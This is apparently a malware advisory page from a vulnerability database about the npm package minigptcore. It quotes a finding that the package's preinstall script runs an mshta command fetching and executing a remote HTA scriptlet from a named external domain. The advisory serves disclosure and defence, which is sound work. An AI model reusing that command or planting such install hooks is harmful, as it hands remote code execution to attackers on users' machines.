VDB
EN

MAL-2026-10417

Malicious code in minigptcore (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8be3fb8ddeae3078f0765ce77f9a329caacd7ee5741b2c96dcf8f613f5444ba0) On `npm install`, the package's preinstall script (preinstall.js) invokes `cmd /c mshta http://fixars.top/...`, causing Windows mshta.exe to fetch and execute an HTA scriptlet from a hardcoded external domain over plain HTTP. The fetched content is unpinned, unverified, and unrelated to any documented package purpose, and executes with the privileges of the user running `npm install`. package.json ships placeholder metadata (empty author, empty keywords, generic description) consistent with a throwaway upload whose only functional effect is the remote-code-execution dropper.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / minigptcore

No fixed version published yet for minigptcore (npm). Pin to a known-safe version or switch to an alternative.

참고